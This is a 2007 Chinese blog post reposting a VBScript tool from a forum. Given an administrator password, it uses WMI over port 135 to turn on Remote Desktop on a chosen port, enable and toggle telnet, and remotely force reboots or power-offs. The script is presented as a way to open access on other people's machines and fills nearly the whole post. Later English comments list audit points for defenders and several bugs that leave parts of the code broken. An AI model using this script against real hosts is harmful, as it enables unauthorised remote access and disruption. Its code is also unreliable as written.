一段 VBS 脚本

    [雷阵雨 September 19, 2007 14:02 | by ]
冷漠PS:在CISSP论坛看到有人贴出来的一段 VBS 脚本,作用是 :可以通过135端口开启telnet,也就是说只要开了135有了系统管理员帐号密码连3389都可以开,一共有三个功能:开3389,开telnet,开关机...

' Remote-administration script that drives a target host over WMI with a
' supplied administrator credential (the post above says this rides port
' 135, i.e. the DCOM transport). Every mode leaves inspectable artifacts
' on the target: registry values under the Terminal Server, TermDD /
' TermService and TelnetServer keys, a start-mode / running-state change
' of the tlntsvr service, or a Win32Shutdown call. Those remote registry
' and service writes, and the remote WMI connections that carry them, are
' the audit points for a defender (unexpected RDP port changes, telnet
' service being enabled, remote reboots from an unfamiliar account).
'
' Positional arguments (see main() for the banner):
'   0 mode ("1" RDP, "2" telnet, "3" power action)
'   1 target IP   2 username   3 password
'   4.. mode-specific (see each case below)
'
' With on error resume next, no WMI failure raises; each step is instead
' reported through error(err.number) or error(<method return value>), and a
' failed call leaves the affected variable Empty.
on error resume next
' Console stream used for progress text written without a trailing newline.
set xsjd=wscript.stdout
' When launched under the GUI host (wscript.exe) the stdout writes would be
' invisible, so re-run the script in a cmd window under cscript and exit.
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
' Arguments are read before any count check; a missing one becomes Empty.
change=wscript.arguments(0)
ip=wscript.arguments(1)
user=wscript.arguments(2)
pass=wscript.arguments(3)
' Usage banner is printed on every run.
main()
xsjd.write "连接 "&ip&"中 ...."
select case change
' ---- Mode 1: enable Terminal Services (RDP) through the registry ----
case "1"
' The root/cimv2 connection with the given credential is made before the
' argument count is validated.
set objwmi=createobject("wbemscripting.swbemlocator")
set objwmiservices=objwmi.connectserver(ip,"root/cimv2",user,pass)
wscript.echo "您选择的服务是打开目标主机的终端服务."
if wscript.arguments.count<4 then
wscript.echo "没有足够的参数."
wscript.quit
end if
' Same condition as the check just above, so this branch has already
' exited when it would apply; port is taken from the fifth argument.
if wscript.arguments.count<4 then
port=3389
else
port=wscript.arguments(4)
end if
if not isnumeric(port) or port<1 or port>65000 then
wscript.echo "端口错误."
wscript.quit
end if
' Optional sixth argument; "c" (case-insensitive) requests a reboot below.
if wscript.arguments.count>5 then
reboot=wscript.arguments(5)
else
reboot=""
end if
' SWbemPrivilege values: 23 = RemoteShutdown, 18 = Shutdown (per the
' documented enumeration). Needed for the Win32Shutdown call further down.
objwmiservices.security_.privileges.add 23,true
objwmiservices.security_.privileges.add 18,true
error(err.number)
xsjd.write "检查超作系统类型...."
' Server editions proceed silently; anything else is shown and a y/n prompt
' is attempted. No "instreem" object is defined anywhere in the listing, so
' under on error resume next strcancel is Empty and the script quits.
set objcxwql=objwmiservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in objcxwql
if instr(objinstoscaption.caption,"Server")>0 then
wscript.echo "OK!"
else
wscript.echo "超作系统是: "&objinstoscaption.caption
xsjd.write "你确认要结束?[y/n]"
strcancel=instreem.read
if lcase(strcancel)<>"n" then wscript.quit
end if
next
xsjd.write "正在打开服务请稍后 ...."
' Second connection, to root/default, to obtain the StdRegProv registry
' provider; all writes below go to HKEY_LOCAL_MACHINE (&h80000002).
set objwmiinstreg=objwmi.connectserver(ip,"root/default",user,pass).get("stdregprov")
HKLM=&h80000002
with objwmiinstreg
' The first createkey is written without a hive argument, as in the original.
.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
' TSEnabled=1 plus Start=2 (service-control "automatic") on the two
' terminal-services drivers/services: these are the values a defender would
' baseline and alert on when changed remotely.
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
.setstringvalue HKLM,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
' Non-default RDP listener port is another detection signal.
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
error(err.number)
rebt=lcase(reboot)
if rebt="c" then
xsjd.write "重新启动目标计算机...."
' Win32Shutdown(6): flag 6 is "forced reboot" per this script's own table
' in mode 3 (4 = forced, 2 = reboot).
strwql="select * from win32_operatingsystem where primary='true'"
set wqlstances=objwmiservices.execquery(strwql)
for each objinstance in wqlstances
objinstance.win32shutdown(6)
next
error(err.number)
else
wscript.echo "您的帐号需要足够的权限."&vbcrlf&""
end if
wscript.echo "服务打开,,您可以连接终端服务在: "&port&" . 祝您好运!"
wscript.quit
' ---- Mode 2: configure and toggle the telnet server (tlntsvr) ----
case "2"
' Six arguments: the two extra are the NTLM mode (0-2) and the telnet port.
if wscript.arguments.count<6 then
wscript.echo "开启telnet的参数不够."
wscript.quit
end if
ntlm=wscript.arguments(4)
port=wscript.arguments(5)
if not isnumeric(port) or port<1 or port>65000 then
wscript.echo "端口错误."
wscript.quit
end if
if not isnumeric(ntlm) or ntlm<0 or ntlm>2 then
main()
wscript.echo "NTML终端类型出错."
wscript.quit
end if
set objwmi=createobject("wbemscripting.swbemlocator")
set objwmiservices=objwmi.connectserver(ip,"root/default",user,pass)
error(err.number)
xsjd.write "设置终端类型为:NTLM="&ntlm&"...."
' StdRegProv.SetDWORDValue invoked through the explicit method/in-parameter
' objects rather than the direct call used in mode 1. Writes
' HKLM\SOFTWARE\Microsoft\TelnetServer\1.0\NTLM.
set objwmistance=objwmiservices.get("stdregprov")
set objwmimethod=objwmistance.methods_("SetDWORDvalue")
set objwmiinparam=objwmimethod.inparameters.spawninstance_()
objwmiinparam.hdefkey=&h80000002
objwmiinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0"
objwmiinparam.svaluename="NTLM"
objwmiinparam.uvalue=ntlm
set objwmioutparam=objwmistance.execmethod_("SetDWORDvalue",objwmiinparam)
error(objwmioutparam.returnvalue)

' Same in-parameter object reused; only the value name and data change.
xsjd.write "设定telnet端口: port="&port&"...."
objwmiinparam.svaluename="TelnetPort"
objwmiinparam.uvalue=port
set objwmioutparam=objwmistance.execmethod_("SetDWORDvalue",objwmiinparam)
error(objwmioutparam.returnvalue)

' Reconnect to root\cimv2 (backslash form here, slash form in mode 1) and
' look up the tlntsvr service.
xsjd.write "查询telnet服务状态中...."
set objwmiservices=objwmi.connectserver(ip,"root\cimv2",user,pass)
set wqlstances=objwmiservices.execquery("select * from win32_service where name='tlntsvr'")
error(err.number)
for each objwmiinstance in wqlstances
' A Disabled service has its start mode switched to Manual via the method
' named "changemode" as written here. The result is read from objoutparam,
' a different variable from the objwmioutparam assigned on the line above.
if objwmiinstance.startmode="Disabled" then
xsjd.write "telnet服务没有打开,尝试更换启动方式"
set objwmimethod=objwmiinstance.methods_("changemode")
set objwmiinparam=objwmimethod.inparameters.spawninstance_()
objwmiinparam.startmode="Manual"
set objwmioutparam=objwmiinstance.execmethod_("changemode",objwmiinparam)
error(objoutparam.returnvalue)
end if
' Despite the "open service" text this is a toggle: a running service is
' stopped, a stopped one is started.
xsjd.write "打开服务...."
if objwmiinstance.started=true then
intstatus=objwmiinstance.stopservice()
error(intstatus)
wscript.echo "尝试关闭服务成功."
else
intstatus=objwmiinstance.startservice()
error(intstatus)
wscript.echo "成功打开服务!"
end if
next
' ---- Mode 3: remote logoff / shutdown / reboot / power-off ----
case "3"
if wscript.arguments.count<5 then
wscript.echo "没有足够的参数."
wscript.quit
end if
' Fifth argument selects the Win32Shutdown flag: 0 logoff, 1 shutdown,
' 2 reboot, 8 power off; an "f" prefix adds 4 (forced).
intface=wscript.arguments(4)
select case intface
case "r"
flag=2
show="重新启动"
case "s"
flag=1
show="关机"
case "l"
flag=0
show="注销"
case "p"
flag=8
show="掉电"
case "fr"
flag=6
show="强制重启"
case "fs"
flag=5
show="强制关机"
case "fl"
flag=4
show="强制注销"
case "fp"
flag=12
show="强制掉电"
case else
main()
wscript.echo "参数错误"
wscript.quit
end select
' strshow is never assigned in this listing (the table above fills show),
' so the progress line prints without the action name.
xsjd.write ""&strshow&"目标计算机...."
' objwmiservices is only assigned inside modes 1 and 2; in this mode the
' query runs against an unset variable and the outcome is reported by
' error(err.number).
strwql="select * from win32_operatingsystem where primary='true'"
set wqlstances=objwmiservices.execquery(strwql)
for each objinstance in wqlstances
objinstance.win32shutdown(flag)
next
error(err.number)
end select
function main()
' Usage banner: tool name, attribution and the argument layout, printed to
' the console between two rows of 99 asterisks. Called once at startup and
' again before the argument-validation exits in modes 2 and 3.
dim usageLines, usageLine
usageLines = array( _
"dsds v1.01", _
"远程打开终端服务或者telnet服务, by dsds8152", _
"copyright:www.xren.net", _
"使用说明:", _
"cscript "&wscript.scriptfullname&" n targetIP username password (NTLM) (port) (-c)", _
"括号为选添项目", _
" n的数值为1,或者2,1为开启终端服务,2为开启telnet服务,3:远程计算机状态(选择r:重启)", _
" s:关机", _
" l:注销", _
" p:关闭电源", _
" 谢谢您的使用")
wscript.echo string(99,"*")
for each usageLine in usageLines
wscript.echo usageLine
next
' Closing row carries an extra blank line, as the original does.
wscript.echo string(99,"*")&vbcrlf
end function
function error(errornumber)
' Outcome reporter for the preceding WMI step. A non-zero code (err.number
' or a method return value) prints "Error!" and terminates the script; the
' raw code itself is not shown and err is not cleared. Zero prints the
' success message and returns to the caller.
if errornumber<>0 then
wscript.echo "Error!"
wscript.quit
end if
wscript.echo "成功!"
end function

